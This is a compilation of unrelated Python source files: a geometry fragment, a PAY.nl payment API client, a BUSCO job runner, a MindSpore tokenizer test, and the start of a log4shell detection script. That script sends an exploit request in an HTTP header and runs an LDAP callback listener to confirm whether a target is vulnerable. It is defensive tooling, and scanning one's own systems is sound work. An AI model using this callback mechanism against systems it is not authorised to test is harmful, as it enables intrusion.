    a2, b2, c2 = line_equation(*edge2)
    det = matrix_det(a2, b2, a1, b1)
    if det == 0:
        return edge1[1]
    return [-matrix_det(c2, b2, c1, b1) / det,
            -matrix_det(a2, c2, a1, c1) / det]
|
import json
import sys
import requests
import base64
from paynlsdk2.api.requestbase import RequestBase
from paynlsdk2.exceptions import ErrorException
from paynlsdk2.validators import ParamValidator
# Base URL of the PAY.nl REST API.
PAYNL_END_POINT = "https://rest-api.pay.nl"
# SDK version reported in the User-Agent header.
PAYNL_CLIENT_VERSION = "1.0.0"
class APIAuthentication(object):
    """
    API Authentication details
    :cvar str api_token: API token
    :cvar str service_id: service ID in the form of SL-xxxx-xxxx
    :cvar str token_code: token code in the form of AT-xxxx-xxxx
    :cvar bool use_http_auth: whether we use basic HTTP authentication or not.
    You should never really change this: Basic HTTP auth should be used by default!
    """
    api_token = None
    service_id = None
    token_code = None
    use_http_auth = True
class APIClient(object):
    """Low-level HTTP client that performs the actual calls to the PAY.nl API."""
    # When True, request/response details are printed to stdout.
    # NOTE(review): the debug output includes the Authorization header and
    # all request parameters - never enable in production logs.
    print_debug = False
    def __init__(self):
        # Only HTTP 200 is accepted; any other status raises via raise_for_status().
        self.__supported_status_codes = [200]
        self.end_point = PAYNL_END_POINT
        self.client_version = PAYNL_CLIENT_VERSION
        self.api_token = None
        self.service_id = None
    def get_auth(self, as_string=True):
        """
        Get Basic HTTP auth string to use in header
        :param as_string: whether to return as string. If False, returns bytes
        :type as_string: bool
        :return: generated auth
        :rtype: str
        """
        # Basic auth credentials are "token_code:api_token", base64-encoded.
        enc = base64.b64encode('{}:{}'.format(APIAuthentication.token_code, APIAuthentication.api_token).encode())
        if as_string:
            return enc.decode()
        else:
            return enc
    def user_agent(self):
        # type: () -> str
        """
        Get user agent string (will be used when calling the API)
        :return: API user agent
        :rtype: str
        """
        version = '{0}.{1}.{2}'.format(sys.version_info[0], sys.version_info[1], sys.version_info[2])
        return "PAYNL/SDK/{0} Python/{1} ({2})".format(self.client_version, version, sys.hexversion)
    def perform_request(self,
                        request,
                        method='POST'
                        ):
        # type: (RequestBase, str) -> None
        """
        Performs the actual call to the API and fill the responses.
        This method will basically verify the given :class:`paynlsdk2.api.requestbase.RequestBase` class,
        perform the call to the API, interpret the result and fill the request's
        :attr:`paynlsdk2.api.requestbase.RequestBase.response` attribute.
        Interpreting the result is done by evaluating the returned JSON using marshmallow.
        When validation is complete, the request class will internally set the response, which is always an instance
        of a :class:`paynlsdk2.api.responsebase.ResponseBase` instance
        .. seealso::
            :class:`paynlsdk2.api.requestbase.RequestBase` and all it's derived classes
            :class:`paynlsdk2.api.responsebase.ResponseBase` and all it's derived classes
        :param request: the generic request to perform
        :type request: paynlsdk2.api.requestbase.RequestBase
        :param method: HTTP method (stick to POST!)
        :type method: str
        :return: void
        :rtype: void
        :raise paynlsdk2.exceptions.ErrorException: generic error occurred
        :raise paynlsdk2.exceptions.SchemaException: error occurred during result parsing (schema load/validation failure)
        """
        headers = {
            'Accept': 'application/json',
            'User-Agent': self.user_agent()
        }
        if APIAuthentication.use_http_auth:
            headers['Authorization'] = 'Basic {auth}'.format(auth=self.get_auth())
        # Lazy loader for api credentials.
        if request.requires_api_token() and ParamValidator.is_empty(request.api_token)\
                and ParamValidator.not_empty(APIAuthentication.api_token):
            request.api_token = APIAuthentication.api_token
        if request.requires_service_id() and ParamValidator.is_empty(request.service_id)\
                and ParamValidator.not_empty(APIAuthentication.service_id):
            request.service_id = APIAuthentication.service_id
        # Build url
        url = "{0}/{1}".format(PAYNL_END_POINT, request.get_url())
        parameters = request.get_parameters()
        # The token is already carried by the Authorization header; do not
        # send it a second time as a body parameter.
        if APIAuthentication.use_http_auth and 'token' in parameters:
            del parameters['token']
        if self.print_debug:
            print("Calling {} using {}".format(url, method))
            print("HTTP Headers: {}".format(json.dumps(headers)))
            print("Params: {}".format(json.dumps(parameters)))
        if method.upper() == 'GET':
            response = requests.get(url, verify=True, headers=headers, params=parameters)
        else:
            response = requests.post(url, verify=True, headers=headers, data=parameters)
        if response.status_code not in self.__supported_status_codes:
            response.raise_for_status()
        if self.print_debug:
            print("Response object: {}".format(response))
            print("Raw response: {}".format(response.text))
        # Now the we have a response, let the request class handle the response.
        request.raw_response = response.text
        if self.print_debug:
            print(type(request.response))
        if request.response.is_error():
            raise ErrorException(request.response.request)
|
# src/busco/busco_tools/Toolset.py
#!/usr/bin/env python3
# coding: utf-8
"""
.. module:: Toolset
:synopsis: the interface to OS enables to run executables / scripts
in external processes
.. versionadded:: 3.0.0
.. versionchanged:: 4.0.0
Copyright (c) 2016-2021, <NAME> (<EMAIL>)
Licensed under the MIT license. See LICENSE.md file.
"""
import os
import subprocess
from subprocess import TimeoutExpired
from multiprocessing import Process, Pool, Value, set_start_method
import time
from abc import ABCMeta, abstractmethod
from busco.BuscoLogger import BuscoLogger
from busco.BuscoLogger import LogDecorator as log
from busco.Exceptions import BatchFatalError
logger = BuscoLogger.get_logger(__name__)
class Job(Process):
    """
    Builds and executes one work item (an external tool invocation) in a
    separate process.
    """

    def __init__(
        self, tool_name, cmd, job_outlogger, job_errlogger, timeout, cwd, **kwargs
    ):
        """
        :param tool_name: name of the executable / script ("a tool") to be run
        :type tool_name: str
        :param cmd: the command to execute; parameters are appended later
            through :meth:`add_parameter`
        :type cmd: str
        :param job_outlogger: path of the file receiving the job's stdout
        :type job_outlogger: str
        :param job_errlogger: path of the file receiving the job's stderr
        :type job_errlogger: str
        :param timeout: seconds after which the job is killed (None = no limit)
        :param cwd: working directory for the subprocess
        :type cwd: str
        """
        # initialize parent
        super().__init__()
        self.tool_name = tool_name
        self.cmd_line = [cmd]
        self.job_outlogger = job_outlogger
        self.job_errlogger = job_errlogger
        self.timeout = timeout
        self.cwd = cwd
        self.kwargs = kwargs

    def add_parameter(self, parameter):
        """
        Append parameter to the command line
        :param parameter: a parameter
        :type parameter: str
        """
        self.cmd_line.append(parameter)

    @log("cmd call: {}", logger, attr_name="cmd_line", apply="join", debug=True)
    def run(self):
        """
        Start the external process and block until it finishes (or times out),
        then write its captured stdout/stderr to the log files and bump the
        shared completed-jobs counter.
        """
        with open(self.job_outlogger, "wb") as f_out:
            with open(self.job_errlogger, "wb") as f_err:
                try:
                    process = subprocess.run(
                        self.cmd_line,
                        stdout=subprocess.PIPE,  # stdout and stderr streams are stored and written to file after job completion
                        stderr=subprocess.PIPE,
                        cwd=self.cwd,
                        shell=False,
                        timeout=self.timeout,
                    )
                    stdout, stderr = process.stdout, process.stderr
                except TimeoutExpired as err:
                    logger.warning(
                        "The following job was killed as it was taking too long (>1hr) to "
                        "complete.\n{}".format(" ".join(self.cmd_line))
                    )
                    # BUGFIX: on timeout `process` was never bound, so the
                    # writes below raised NameError in the worker process.
                    # TimeoutExpired carries whatever output was captured
                    # before the child was killed (possibly None).
                    stdout = err.stdout or b""
                    stderr = err.stderr or b""
                f_out.write(stdout)
                f_err.write(stderr)
        # `cnt` is a multiprocessing.Value installed into each pool worker by
        # Tool.init_globals; it tracks how many jobs have completed.
        with cnt.get_lock():
            cnt.value += 1
class ToolException(Exception):
    """Module-specific exception raised by the Toolset helpers."""

    def __init__(self, value):
        # Store the message without delegating to Exception.__init__,
        # mirroring the historical behaviour (`args` stays empty).
        self.value = value

    def __str__(self):
        return self.value
class Tool(metaclass=ABCMeta):
    """
    Collection of utility methods used by all tools
    """
    # NOTE: executed at class-definition (import) time, not per instance -
    # forces the "spawn" multiprocessing start method for the whole app.
    set_start_method("spawn", force=True)
    def __init__(self):
        """
        Initialize job list for a tool.
        Relies on the subclass-provided ``name`` property; augustus gets a
        1-hour timeout and special output handling, every other tool runs
        without a timeout.
        """
        if self.name == "augustus":
            self.kwargs = {"augustus_out": True}
            self.timeout = 3600  # Possibly no longer necessary from 5.2.0 with the new logging system in place, but no harm to leave it here
        else:
            self.kwargs = {}
            self.timeout = None
        self.jobs_to_run = []
        self.jobs_running = []
        self.nb_done = 0
        self.total = 0
        self.cpus = None
        self.chunksize = None
        self.cwd = os.getcwd()
    @abstractmethod
    def configure_job(self):
        pass
    @abstractmethod
    def generate_job_args(self):
        pass
    @property
    @abstractmethod
    def name(self):
        raise NotImplementedError
    @abstractmethod
    def write_checkpoint_file(self):
        pass
    def create_job(self):
        """
        Create one work item
        """
        # NOTE(review): `self.cmd`, `self.logfile_path_out` and
        # `self.logfile_path_err` are expected to be set by the subclass
        # before this is called - confirm against the concrete tools.
        job = Job(
            self.name,
            self.cmd[:],
            self.logfile_path_out,
            self.logfile_path_err,
            self.timeout,
            self.cwd,
            **self.kwargs
        )
        self.jobs_to_run.append(job)
        return job
    def remove_job(self, job):
        """
        Remove one work item
        :param job: the Job to remove
        :type job: Job
        """
        self.jobs_to_run.remove(job)
    def log_jobs_to_run(self):
        """Log how many jobs are about to run and when they started."""
        logger.info(
            "Running {} job(s) on {}, starting at {}".format(
                self.total, self.name, time.strftime("%m/%d/%Y %H:%M:%S")
            )
        )
        return
    @log("No jobs to run on {}", logger, attr_name="name", iswarn=True)
    def log_no_jobs(self):
        return
    def run_jobs(self):
        """Run all queued jobs on a process pool, then write the checkpoint."""
        if self.total > 0:
            self.log_jobs_to_run()
        else:
            self.log_no_jobs()
            return
        if self.cpus is None:
            raise BatchFatalError("Number of CPUs not specified.")
        elif self.cpus == 0:
            raise BatchFatalError("Number of CPUs must be greater than 0.")
        # Each worker gets the shared completed-jobs counter via init_globals.
        with Pool(
            self.cpus, initializer=type(self).init_globals, initargs=(Value("i", 0),)
        ) as job_pool:
            job_pool.map(
                self.run_job, self.generate_job_args(), chunksize=self.chunksize
            )
        self.write_checkpoint_file()
    def run_job(self, args):
        """Configure and run one job inside a pool worker; log progress ~every 10%."""
        args = (
            (args,) if isinstance(args, str) else tuple(args or (args,))
        )  # Ensure args are tuples that can be unpacked. If no args, args=None, which is falsy, and this evaluates to (None,)
        job = self.configure_job(*args)
        job.run()
        # `cnt` is the per-worker global counter set up in init_globals.
        self.nb_done = cnt.value
        if (
            self.nb_done == self.total
            or int(self.nb_done % float(self.total / 10)) == 0
        ):
            self._track_progress()
    @log(
        "[{0}]\t{1} of {2} task(s) completed",
        logger,
        attr_name=["name", "nb_done", "total"],
        on_func_exit=True,
    )
    def _track_progress(self):
        return
    @classmethod
    def init_globals(cls, counter):
        """Counter code adapted from the answer here: https://stackoverflow.com/a/53621343/4844311"""
        global cnt
        cnt = counter
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Testing WordpieceTokenizer op in DE
"""
import numpy as np
import mindspore.dataset as ds
from mindspore import log as logger
import mindspore.dataset.text as nlp
# Input fixture: one text line per test case.
WORDPIECE_TOKENIZER_FILE = "../data/dataset/testTokenizerData/wordpiece_tokenizer.txt"
# "##" marks a sub-word continuation piece, per the WordPiece convention.
vocab_english = [
    "book", "cholera", "era", "favor", "##ite", "my", "is", "love", "dur", "##ing", "the"
]
vocab_chinese = [
    "我", '最', '喜', '欢', '的', '书', '是', '霍', '乱', '时', '期', '爱', '情'
]
vocab_mix = vocab_chinese + vocab_english
# Each entry: line range [first, last] of the fixture file, the expected
# tokens per line, the vocabulary, and optional tokenizer overrides.
test_paras = [
    dict(
        first=1,
        last=10,
        expect_str=[['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'],
                    ['era'], ['[UNK]']],
        vocab_list=vocab_english
    ),
    dict(
        first=1,
        last=10,
        expect_str=[['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'],
                    ['era'], ['what']],
        vocab_list=vocab_english,
        unknown_token=""
    ),
    dict(
        first=1,
        last=10,
        expect_str=[['my'], ['[UNK]'], ['book'], ['is'], ['love'], ['[UNK]'], ['the'], ['[UNK]'], ['era'], ['[UNK]']],
        vocab_list=vocab_english,
        max_bytes_per_token=4
    ),
    dict(
        first=11,
        last=25,
        expect_str=[['我'], ['最'], ['喜'], ['欢'], ['的'], ['书'], ['是'], ['霍'], ['乱'], ['时'], ['期'], ['的'], ['爱'], ['情'],
                    ['[UNK]']],
        vocab_list=vocab_chinese,
    ),
    dict(
        first=25,
        last=25,
        expect_str=[['您']],
        vocab_list=vocab_chinese,
        unknown_token=""
    ),
    dict(
        first=1,
        last=25,
        expect_str=[
            ['my'], ['favor', '##ite'], ['book'], ['is'], ['love'], ['dur', '##ing'], ['the'], ['cholera'], ['era'],
            ['[UNK]'],
            ['我'], ['最'], ['喜'], ['欢'], ['的'], ['书'], ['是'], ['霍'], ['乱'], ['时'], ['期'], ['的'], ['爱'], ['情'],
            ['[UNK]']],
        vocab_list=vocab_mix,
    ),
]
def check_wordpiece_tokenizer(first, last, expect_str, vocab_list, unknown_token='[UNK]', max_bytes_per_token=100):
    """
    Run WordpieceTokenizer over lines [first, last] of the fixture file and
    compare each tokenized line against the expected tokens.

    :param first: 1-based index of the first fixture line to use
    :param last: 1-based index of the last fixture line to use
    :param expect_str: expected token lists, one per input line
    :param vocab_list: vocabulary words used to build the Vocab
    :param unknown_token: replacement for out-of-vocab words ('' keeps the word)
    :param max_bytes_per_token: words longer than this are not split
    """
    dataset = ds.TextFileDataset(WORDPIECE_TOKENIZER_FILE, shuffle=False)
    if first > 1:
        dataset = dataset.skip(first - 1)
    if last >= first:
        dataset = dataset.take(last - first + 1)
    vocab = nlp.Vocab.from_list(vocab_list)
    tokenizer_op = nlp.WordpieceTokenizer(vocab=vocab, unknown_token=unknown_token,
                                          max_bytes_per_token=max_bytes_per_token)
    dataset = dataset.map(operations=tokenizer_op)
    count = 0
    for i in dataset.create_dict_iterator():
        text = nlp.to_str(i['text'])
        # BUGFIX: logger.info uses %-style lazy formatting; the original
        # passed the value as an extra positional argument without a
        # placeholder ("Out:", text), which raises a logging format error.
        logger.info("Out: %s", text)
        logger.info("Exp: %s", expect_str[count])
        np.testing.assert_array_equal(text, expect_str[count])
        count = count + 1
def test_wordpiece_tokenizer():
    """
    Test WordpieceTokenizer against every parameter set in test_paras.
    """
    for case in test_paras:
        check_wordpiece_tokenizer(**case)
if __name__ == '__main__':
    test_wordpiece_tokenizer()
|
#!/usr/bin/env python3
#------------------------------------------------------------------------------
# log4sh-detect.py
#
# Tests the Specified Host for the log4shell Vulnerability.
#
# NOTE(s):
#
# * Morty and Morty's Creations ASSUMES ZERO LIABILITY relating to the
# results obtained by this script.
#
# * The exploit *REQUIRES* that the host being exploited can connect BACK
# to a "rogue" server for further command.
#
# * The protocol used to trigger an outbound connection on the exploited
# host is IRRELEVANT (besides a WAF Blocking Action which may hit ONLY
# a SPECIFIC protocol).
#
# * The host being used to run the (this) Detection Program MUST BE ABLE
# TO BIND to the port sent within the exploit.
#
# - This means that firewall (and / or Malware Apps) on the host running
# this script needs access to open a Listening Port.
#
# - Attempting to run this script OVER THE INTERNET will require the
# host running this script to either be FULLY INTERNET FACING or have
# a Port Map from the Externally-Facing IP / Port to the host
# running this script.
#
# Morty
# Copyright (c) 2021 by Morty's Creations - 2021-12-14
#------------------------------------------------------------------------------
# IMPORTS
#------------------------------------------------------------------------------
from pprint import (pprint, pformat)
from datetime import (datetime)
from threading import (Thread, Event)
try:
from threading import Queue
except:
try:
from queue import Queue
except:
pass
import getopt
import logging
import os
import random
import requests
import select
import signal
import socket
import string
import struct
import sys
import time
import urllib.request
import urllib3
#------------------------------------------------------------------------------
# Reference the otherwise-unused imports so linters do not flag them.
_ = [
  pprint,
  pformat,
  time
]
#------------------------------------------------------------------------------
PROGRAM = os.path.basename(sys.argv[0])
VERSION = "1.6"
REVISION = "20211220-1"
AUTHOR = "Morty (Morty's Creations)"
#------------------------------------------------------------------------------
# GLOBALS / CONSTANTS
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
USER_AGENT = ("MortysCreations_log4sh-detect/%s" % (VERSION))
#------------------------------------------------------------------------------
# Process exit codes (see usage() for the full meaning of each value).
RETVAL_NOT_VULNERABLE = 0
RETVAL_VULNERABLE = 1
RETVAL_NO_TEST = 2
RETVAL_TEST_FAILED = 3
RETVAL_PATCHED = 4
#------------------------------------------------------------------------------
# Arrow labels used by the hexdump header to show traffic direction.
NETWORK_DIR_LABELS = {
  "Receive" : " <-- ",
  "Send" : " --> ",
}
#------------------------------------------------------------------------------
# Passed to requests to bypass any system proxy for direct requests.
PROXY_NONE = {
  "http" : None,
  "https" : None,
}
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
def DATETIME_STRING() :
  """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
  now = datetime.now()
  return now.strftime("%Y-%m-%d %H:%M:%S")
#------------------------------------------------------------------------------
# When True, exceptions are re-raised instead of swallowed (for debugging).
WANT_EXCEPTIONS = False
#------------------------------------------------------------------------------
LEN_RAND_DATA = 30
#------------------------------------------------------------------------------
# Default local port the exploit callback connects back to.
PORT_EXPLOIT_CB_DEF = 1389
#------------------------------------------------------------------------------
# HTTP header carrying the JNDI exploit string.
HEADER_NAME_EXPLOIT = "X-Api-Version"
#------------------------------------------------------------------------------
# Seconds to wait for the exploited host to call back.
TIMEOUT_EXPLOIT_CB = 10.0
#------------------------------------------------------------------------------
TIMEOUT_SOCKET_SELECT = 2.0
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Canned LDAP "bind success" response sent to the calling-back client.
LDAP_BIND_SUCCESS = (
  b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00")
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Mutable runtime state shared across the module's functions.
g_debug = False
g_requestLogger = None
g_resultOnly = False
g_evtAppExit = Event()
#------------------------------------------------------------------------------
g_tcpThread = None
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class TCPThread(Thread):
  """Non-blocking TCP listener that catches the log4shell LDAP callback.

  The exploited host connects back here; we answer its LDAP bind request
  with a canned success packet (LDAP_BIND_SUCCESS) and then scan any
  follow-up traffic for `searchString`.  getResult() is True when the
  string was seen, i.e. the target evaluated the JNDI lookup.
  """
  #----------------------------------------------------------------------------
  def __init__(
      self,
      addr = None,
      port = 1389,
      timeout = TIMEOUT_EXPLOIT_CB,
      searchString = None):
    Thread.__init__(self)
    self._addr = (addr or TCPThread.getPrimaryIP())
    self._port = port
    self._socket = None
    self._evtTerm = Event()
    # Kept internally in milliseconds (caller passes seconds).
    self._timeout = (timeout * 1000)
    self._searchString = searchString
    self._portTestDone = False
    self._result = False
    self._clients = {}
    # Log lines are queued here; flushDebugQueue() drains them on the
    # caller's thread so output is not interleaved.
    self._qLog = Queue()
  #----------------------------------------------------------------------------
  def begin(self):
    """Create/bind/listen on the server socket and start the thread.

    Returns the bound port on success, None on failure.
    """
    self._debug("TCPThread: begin()")
    ret = None
    try:
      self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      self._socket.setblocking(0)
      if(self._socket is not None):
        self._port = self.bindToPort(self._port)
        if(self._port is not None):
          self._socket.listen(1)
          self.start()
          ret = self._port
    except:
      self._socket = None
      ret = None
      if(WANT_EXCEPTIONS): raise
    return(ret)
  #----------------------------------------------------------------------------
  @staticmethod
  def socketShutdown(sock, qLog:Queue):
    """Hard-close a socket (SO_LINGER 0 => immediate RST, no TIME_WAIT)."""
    ret = False
    addr = TCPThread.getSocketInfo(sock)
    try:
      sock.setsockopt(socket.SOL_SOCKET,
                      socket.SO_LINGER,
                      struct.pack('ii', 1, 0))
      sock.shutdown(socket.SHUT_RDWR)
      sock.close()
      ret = True
    except Exception as e:
      qLog.put("TCPThread::socketClose - EXCEPTION [socket = %s]: %s" %
               (addr, str(e)))
      if(WANT_EXCEPTIONS): raise
    if(g_debug):
      qLog.put("TCPThread::socketClose [socket = %s]: cleanup Complete: %s" %
               (addr, str(ret)))
    return(ret)
  #----------------------------------------------------------------------------
  def cancel(self):
    """Ask the listener loop to terminate at its next select() wakeup."""
    self._debug("TCPThread::cancel BEGIN")
    if(self._evtTerm is not None):
      self._evtTerm.set()
  #----------------------------------------------------------------------------
  def getResult(self):
    """True when the search string was seen in the callback traffic."""
    return(self._result)
  #----------------------------------------------------------------------------
  def run(self):
    # The Socket Server uses NON-BLOCKING Sockets (via select()) so that we
    # can (gracefully) terminate as needed.
    self._debug("TCPThread::run() BEGIN")
    sockList = [self._socket]
    msStart = time.time() * 1000
    while (not self._evtTerm.is_set()):
      (rr, rw, err) = select.select(sockList,
                                    sockList,
                                    sockList,
                                    TIMEOUT_SOCKET_SELECT)
      for rs in rr:
        # READABLE SOCKETS:
        if(rs == self._socket):
          # READABLE LISTENER (SERVER) SOCKET: accept the new client.
          (conn, addr) = rs.accept()
          self._clients[conn] = {
            "state" : "init",
            "addr" : ("%s:%d" % (addr[0], addr[1])),
            "conn" : conn,
          }
          self._debug("Received Connection on Port %d from %s:%d%s" % (
                      self._port,
                      addr[0],
                      addr[1],
                      (" [CALLBACK_PORT_TEST_NOT_EXPLOIT]"
                       if(not(self._portTestDone)) else "")))
          if(not(self._portTestDone)):
            self._portTestDone = True
          conn.setblocking(0)
          sockList.append(conn)
        else:
          # READABLE CLIENT SOCKET: advance the per-client LDAP state machine.
          client = self._clients.get(rs, None)
          if(client is not None):
            data = rs.recv(1024)
            dataAscii = TCPThread.decodeToAscii(data)
            if(data):
              if(g_debug):
                TCPThread.hexdump(data, rs, self._qLog, "Receive")
              if(client["state"] == "init"):
                client["state"] = "ldap_bind_request_received"
              elif(client["state"] == "ldap_bind_success_sent"):
                if(self._searchString is not None):
                  if(self._searchString in dataAscii):
                    self._result = True
                    self._debug("TCPThread/run(): Search String Found: %s" %
                                (self._searchString))
                    break
            else:
              self._debug("Connection Closed: %s" % (client["addr"]))
              sockList.remove(rs)
      for ws in rw:
        # WRITABLE SOCKETS: answer a pending LDAP bind request.
        client = self._clients.get(ws, None)
        if(client is not None):
          if(client["state"] == "ldap_bind_request_received"):
            ws.send(LDAP_BIND_SUCCESS)
            self._debug("Sent LDAP Bind Success to Client: %s" % (client["addr"]))
            client["state"] = "ldap_bind_success_sent"
          elif(client["state"] == "ldap_bind_success_sent"):
            pass
      for es in err:
        # ERROR SOCKET: drop the client entirely.
        client = self._clients.get(es, None)
        if(client is not None):
          self._debug("Socket Error: %s" % (client["addr"]))
          es.close()
          del self._clients[es]
          sockList.remove(es)
      if(self._result):
        self._debug("TCPThread.run(): Search String Found; Exiting Thread...")
        break
      elif(((time.time() * 1000) - msStart) >= self._timeout):
        self._debug("TCPThread.run(): Timeout Reached [%d]; Exiting Thread..." %
                    (self._timeout))
        break
    # BUGFIX: the original removed entries from sockList while iterating it,
    # which skips every other socket and could leave the listener (and
    # clients) open.  Iterate over a snapshot instead.
    sockList.reverse()
    for sock in list(sockList):
      if(sock is not None):
        TCPThread.socketShutdown(sock, self._qLog)
    del sockList[:]
    self._debug("TCPThread::run() COMPLETE")
  #----------------------------------------------------------------------------
  def bindToPort(self, port = None):
    """Bind the server socket to `port`, or scan 10000-32766 when port is None.

    Returns the bound port, or None when binding failed.
    """
    ret = None
    if(self._socket is not None):
      if(port is None):
        for port in range(10000, 32767):
          try:
            self._socket.bind((self._addr, port))
            self._debug("Socket Bound to %s:%d..." % (self._addr, port))
            ret = port
            break
          except:
            pass
      else:
        try:
          self._socket.bind((self._addr, port))
          self._debug("Socket Bound to %s:%d..." % (self._addr, port))
          ret = port
        except:
          if(WANT_EXCEPTIONS): raise
    return(ret)
  #----------------------------------------------------------------------------
  def _debug(self, msg, rawLine = False):
    """Queue a debug line (timestamped unless rawLine) when debugging is on."""
    if(g_debug):
      if(rawLine):
        self._qLog.put("%s" % (msg))
      else:
        self._qLog.put("%s [DEBUG] %s" % (
                       DATETIME_STRING(),
                       msg))
  #----------------------------------------------------------------------------
  def flushDebugQueue(self, file = sys.stderr):
    """Drain the queued log lines to `file` on the caller's thread."""
    while(self._qLog.qsize() > 0):
      line = self._qLog.get()
      self._qLog.task_done()
      print(line, file = file)
  #----------------------------------------------------------------------------
  @staticmethod
  def getSocketInfo(sock, separator = " "):
    """Return 'local_ip:port<separator>remote_ip:port' for a connected socket."""
    ret = "[not_connected]"
    try:
      ret = ("%s:%d%s%s:%d" % (
             *sock.getsockname(),
             separator,
             *sock.getpeername()))
    except:
      ret = "[not_connected]"
    return(ret)
  #----------------------------------------------------------------------------
  @staticmethod
  def decodeToAscii(data):
    """Decode bytes as ISO-8859-1 (never fails on byte values); None otherwise."""
    ret = None
    if(type(data) is bytes):
      try:
        ret = data.decode("iso-8859-1")
      except:
        ret = None
        if(WANT_EXCEPTIONS): raise
    return(ret)
  #----------------------------------------------------------------------------
  @staticmethod
  def hexdump(dataIn, sock:socket, qLog:Queue, action = "Receive"):
    """Queue a classic 16-bytes-per-line hex dump of the traffic."""
    data = None
    if(type(dataIn) is bytes):
      try:
        data = TCPThread.decodeToAscii(dataIn)
      except Exception as e:
        _ = e
        data = None
        if(WANT_EXCEPTIONS): raise
    else:
      data = dataIn
    """
    0000   00 01 02 03 04 05 06 07  08 09 10 11 12 13 14 15  ........ ........
    YYYY-MM-DD HH:MM:SS 255.255.255.255:32767 --> 255.255.255.255:32767
    """
    if(data is None):
      return
    offset = 0
    qLog.put("\n%-19s %-47s %d bytes" % (
             DATETIME_STRING(),
             TCPThread.getSocketInfo(sock,
                                     NETWORK_DIR_LABELS.get(action, "     ")),
             len(data)))
    while (len(data) > 0):
      # BUGFIX: was 15, which printed only 15 bytes per full line and then
      # skipped byte 16 entirely (data = data[16:]).
      endIdx = (16 if(len(data) >= 16) else len(data))
      line = data[0:endIdx]
      strHex = ""
      strAsc = ""
      for bi in range(0, len(line)):
        if((bi > 0) and (bi % 8 == 0)):
          strHex += " "
          strAsc += " "
        strHex += (" %02x" % (ord(line[bi])))
        # BUGFIX: the printable-range test read data[bi] instead of
        # line[bi]; identical on the first chunk only.
        if((ord(line[bi]) >= ord(' ')) and (ord(line[bi]) <= ord('~'))):
          strAsc += chr(ord(line[bi]))
        else:
          strAsc += "."
      qLog.put("%-04s %-48s %s" % (
               ("{:04x}".format(offset)),
               strHex,
               strAsc))
      if(endIdx < 16):
        break
      else:
        data = data[16:]
      offset += len(line)
    print("", file = sys.stderr)
  #----------------------------------------------------------------------------
  @staticmethod
  def getPrimaryIP():
    """Best-effort primary IP of this host (via its hostname), else None."""
    ret = None
    try:
      hn = socket.gethostname()
      if(hn is not None):
        ret = socket.gethostbyname(hn)
    except:
      ret = None
      if(WANT_EXCEPTIONS): raise
    return(ret)
  #----------------------------------------------------------------------------
  @staticmethod
  def waitForThread(t, cancel = False):
    """Optionally cancel, then join thread t and return its result."""
    ret = None
    joined = False
    if(cancel): t.cancel()
    while not joined:
      try:
        # BUGFIX: Thread.join() takes SECONDS; the original passed 500
        # (over 8 minutes per poll).  Poll every half second instead.
        t.join(0.5)
        if(not(t.is_alive())):
          joined = True
          ret = t.getResult()
          t.flushDebugQueue()
      except:
        pass
    return(ret)
  #----------------------------------------------------------------------------
  #----------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
def usage():
  """Print the program banner, option help and disclaimer, then exit
  with RETVAL_NO_TEST (the "test not performed" exit code)."""
  print("\n%s v%s Rev%s\n%s\n" % (PROGRAM, VERSION, REVISION, AUTHOR))
  # NOTE(review): the synopsis shows lowercase "h" in [-i|p|h|t <arg>] but
  # the header-name option is uppercase -H (-h is help) - confirm intent.
  print("Usage: %s [-erTWx] [--skip-http-test] [-i|p|h|t <arg>] <url>" % (
        PROGRAM))
  print("""
  OPTIONS:
    -h | --help                      this message
    url                              url to test for exploit
    -d | --debug                     enable debugging output
    -v | --debug-verbose             enable verbose debug output (requests lib)
    -e | --exploit-only              send exploit request ONLY (NO RESULT)
    -r | --result-only               results only (no status)
    -i | --ip-callback <ip>          ip for exploit callback
    -p | --port-callback <port | a>  port for exploit callback (a* = auto)
    -H | --header <hdr_name>         header name sent in exploit
    -t | --timeout <timeout>         timeout for exploit in seconds
    -T | --skip-callback-test        skip reachability test [NOT RECOMMENDED!]
    -x | --use-system-proxy          send exploit request via Proxy
    -W | --disable-warnings          disable warnings [NOT RECOMMENDED!]
    --skip-http-test                 skip http test [NOT RECOMMENDED!]
  """)
  print("""
  NOTES / **DISCLAIMER**:
  * The exploit *REQUIRES* that the host being exploited can connect BACK
    to a "rogue" server for further command.
  * The protocol used to trigger an outbound connection on the exploited
    host is IRRELEVANT (besides a WAF Blocking Action which may hit ONLY
    a SPECIFIC protocol).
  * The host being used to run the (this) Detection Program MUST BE ABLE
    TO BIND to the port sent within the exploit.
    - This means that firewall (and / or Malware Apps) on the host running
      this script needs access to open a Listening Port.
    - Attempting to run this script OVER THE INTERNET will require the
      host running this script to either be FULLY INTERNET FACING or have
      a Port Map from the Externally-Facing IP / Port to the host
      running this script.
  * RETURN VALUES:
      VALUE   TEST_STATUS     VULNERABLE
        0       SUCCEEDED       NO
        1       SUCCEEDED       YES
        2       NOT PERFORMED   N/A   [Script Usage Only]
        3       FAILED          N/A
        4       SUCCEEDED       NO (PATCHED)  [NEW v1.5]
  * Morty and Morty's Creations ASSUMES ZERO LIABILITY relating to the
    results obtained by this script.
  ** USE AT YOUR OWN RISK **
  """)
  sys.exit(RETVAL_NO_TEST)
#------------------------------------------------------------------------------
def debug(msg, file = sys.stderr, extraLineFeed = True):
    """Emit a timestamped [DEBUG] line when the global debug flag is set."""
